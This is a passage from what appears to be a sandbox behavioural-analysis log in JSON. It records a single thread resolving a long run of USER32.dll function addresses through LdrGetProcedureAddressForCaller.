"FunctionName", "value": "IsWindow" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7664ad00" } ], "repeated": 0, "id": 148 }, { "timestamp": "2025-03-02 21:32:31,857", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "IsRectEmpty" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7664ef00" } ], "repeated": 0, "id": 149 }, { "timestamp": "2025-03-02 21:32:31,857", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "IsIconic" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766461b0" } ], "repeated": 0, "id": 150 }, { "timestamp": "2025-03-02 21:32:31,857", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "IsDialogMessageW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7664a6c0" } ], "repeated": 0, "id": 151 }, { "timestamp": "2025-03-02 21:32:31,873", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "IsDialogMessageA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7663b980" } ], "repeated": 0, "id": 152 }, { "timestamp": "2025-03-02 21:32:31,873", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "IsChild" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766481b0" } ], "repeated": 0, "id": 153 }, { "timestamp": "2025-03-02 21:32:31,873", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "InvalidateRect" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76652720" } ], "repeated": 0, "id": 154 }, { "timestamp": "2025-03-02 21:32:31,889", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "IntersectRect" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766410d0" } ], "repeated": 0, "id": 155 }, { "timestamp": "2025-03-02 21:32:31,889", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "InsertMenuItemA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766a4550" } ], "repeated": 0, "id": 156 }, { "timestamp": "2025-03-02 21:32:31,889", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "InsertMenuA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766a4500" } ], "repeated": 0, "id": 157 }, { "timestamp": "2025-03-02 21:32:31,889", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "InflateRect" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7663e410" } ], "repeated": 0, "id": 158 }, { "timestamp": "2025-03-02 21:32:31,889", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetWindowThreadProcessId" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7664b2e0" } ], "repeated": 0, "id": 159 }, { "timestamp": "2025-03-02 21:32:31,889", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetWindowTextA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76636040" } ], "repeated": 0, "id": 160 }, { "timestamp": "2025-03-02 21:32:31,889", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetWindowRect" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766454b0" } ], "repeated": 0, "id": 161 }, { "timestamp": "2025-03-02 21:32:31,904", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetWindowPlacement" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766525b0" } ], "repeated": 0, "id": 162 }, { "timestamp": "2025-03-02 21:32:31,904", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetWindowLongW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76649240" } ], "repeated": 0, "id": 163 }, { "timestamp": "2025-03-02 21:32:31,904", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetWindowLongA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766456e0" } ], "repeated": 0, "id": 164 }, { "timestamp": "2025-03-02 21:32:31,904", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetWindowDC" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76652560" } ], "repeated": 0, "id": 165 }, { "timestamp": "2025-03-02 21:32:31,904", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetTopWindow" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76630440" } ], "repeated": 0, "id": 166 }, { "timestamp": "2025-03-02 21:32:31,920", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetSystemMetrics" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76645390" } ], "repeated": 0, "id": 167 }, { "timestamp": "2025-03-02 21:32:31,920", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetSystemMenu" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766524c0" } ], "repeated": 0, "id": 168 }, { "timestamp": "2025-03-02 21:32:31,920", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetSysColorBrush" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766503b0" } ], "repeated": 0, "id": 169 }, { "timestamp": "2025-03-02 21:32:31,935", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetSysColor" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7663d970" } ], "repeated": 0, "id": 170 }, { "timestamp": "2025-03-02 21:32:31,935", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetSubMenu" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766323a0" } ], "repeated": 0, "id": 171 }, { "timestamp": "2025-03-02 21:32:31,935", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetScrollRange" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76639a10" } ], "repeated": 0, "id": 172 }, { "timestamp": "2025-03-02 21:32:31,951", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetScrollPos" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76638720" } ], "repeated": 0, "id": 173 }, { "timestamp": "2025-03-02 21:32:31,951", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetScrollInfo" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76635bc0" } ], "repeated": 0, "id": 174 }, { "timestamp": "2025-03-02 21:32:31,951", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetPropA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766357e0" } ], "repeated": 0, "id": 175 }, { "timestamp": "2025-03-02 21:32:31,967", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetParent" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76648510" } ], "repeated": 0, "id": 176 }, { "timestamp": "2025-03-02 21:32:31,967", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetWindow" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7664c970" } ], "repeated": 0, "id": 177 }, { "timestamp": "2025-03-02 21:32:31,967", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetMessagePos" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76650e10" } ], "repeated": 0, "id": 178 }, { "timestamp": "2025-03-02 21:32:31,967", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetMenuStringA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766a4360" } ], "repeated": 0, "id": 179 }, { "timestamp": "2025-03-02 21:32:31,967", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetMenuState" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76631a40" } ], "repeated": 0, "id": 180 }, { "timestamp": "2025-03-02 21:32:31,967", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetMenuItemInfoA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766a42c0" } ], "repeated": 0, "id": 181 }, { "timestamp": "2025-03-02 21:32:31,967", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetMenuItemID" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766324c0" } ], "repeated": 0, "id": 182 }, { "timestamp": "2025-03-02 21:32:31,982", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetMenuItemCount" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76632470" } ], "repeated": 0, "id": 183 }, { "timestamp": "2025-03-02 21:32:31,982", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetMenu" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76644ec0" } ], "repeated": 0, "id": 184 }, { "timestamp": "2025-03-02 21:32:31,982", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetLastActivePopup" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766383f0" } ], "repeated": 0, "id": 185 }, { "timestamp": "2025-03-02 21:32:31,982", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetKeyboardState" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766522c0" } ], "repeated": 0, "id": 186 }, { "timestamp": "2025-03-02 21:32:31,982", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetKeyboardLayoutNameA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7669a430" } ], "repeated": 0, "id": 187 }, { "timestamp": "2025-03-02 21:32:31,982", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetKeyboardLayoutList" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766522b0" } ], "repeated": 0, "id": 188 }, { "timestamp": "2025-03-02 21:32:31,998", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetKeyboardLayout" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7664fe60" } ], "repeated": 0, "id": 189 }, { "timestamp": "2025-03-02 21:32:31,998", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetKeyState" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7664cc70" } ], "repeated": 0, "id": 190 }, { "timestamp": "2025-03-02 21:32:31,998", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetKeyNameTextA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7669a3c0" } ], "repeated": 0, "id": 191 }, { "timestamp": "2025-03-02 21:32:31,998", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetIconInfo" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76650300" } ], "repeated": 0, "id": 192 }, { "timestamp": "2025-03-02 21:32:32,014", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetForegroundWindow" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76652210" } ], "repeated": 0, "id": 193 }, { "timestamp": "2025-03-02 21:32:32,014", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetFocus" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7664f500" } ], "repeated": 0, "id": 194 }, { "timestamp": "2025-03-02 21:32:32,014", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetDlgItem" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76649c70" } ], "repeated": 0, "id": 195 }, { "timestamp": "2025-03-02 21:32:32,014", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetDesktopWindow" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7664a9a0" } ], "repeated": 0, "id": 196 }, { "timestamp": "2025-03-02 21:32:32,014", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetDCEx" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766521b0" } ], "repeated": 0, "id": 197 }, { "timestamp": "2025-03-02 21:32:32,029", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetDC" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7664f590" } ], "repeated": 0, "id": 198 }, { "timestamp": "2025-03-02 21:32:32,029", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetCursorPos" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76635e40" } ], "repeated": 0, "id": 199 }, { "timestamp": "2025-03-02 21:32:32,029", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetCursor" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76652190" } ], "repeated": 0, "id": 200 }, { "timestamp": "2025-03-02 21:32:32,045", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetClipboardData" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766387e0" } ], "repeated": 0, "id": 201 }, { "timestamp": "2025-03-02 21:32:32,045", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetClientRect" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76645730" } ], "repeated": 0, "id": 202 }, { "timestamp": "2025-03-02 21:32:32,045", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetClassLongA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76637890" } ], "repeated": 0, "id": 203 }, { "timestamp": "2025-03-02 21:32:32,045", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetClassInfoA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76636160" } ], "repeated": 0, "id": 204 }, { "timestamp": "2025-03-02 21:32:32,045", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetCapture" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7664fa50" } ], "repeated": 0, "id": 205 }, { "timestamp": "2025-03-02 21:32:32,045", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "GetActiveWindow" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x766387b0" } ], "repeated": 0, "id": 206 }, { "timestamp": "2025-03-02 21:32:32,045", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "FrameRect" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76637a60" } ], "repeated": 0, "id": 207 }, { "timestamp": "2025-03-02 21:32:32,060", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "FindWindowA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76638660" } ], "repeated": 0, "id": 208 }, { "timestamp": "2025-03-02 21:32:32,060", "thread_id": "7632", "caller": "0x004e72ee", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "USER32.dll" }, { "name": "ModuleHandle", "value": "0x76610000" }, { "name": "FunctionName", "value": "FillRect" }, { "name": "Ordinal", "value": 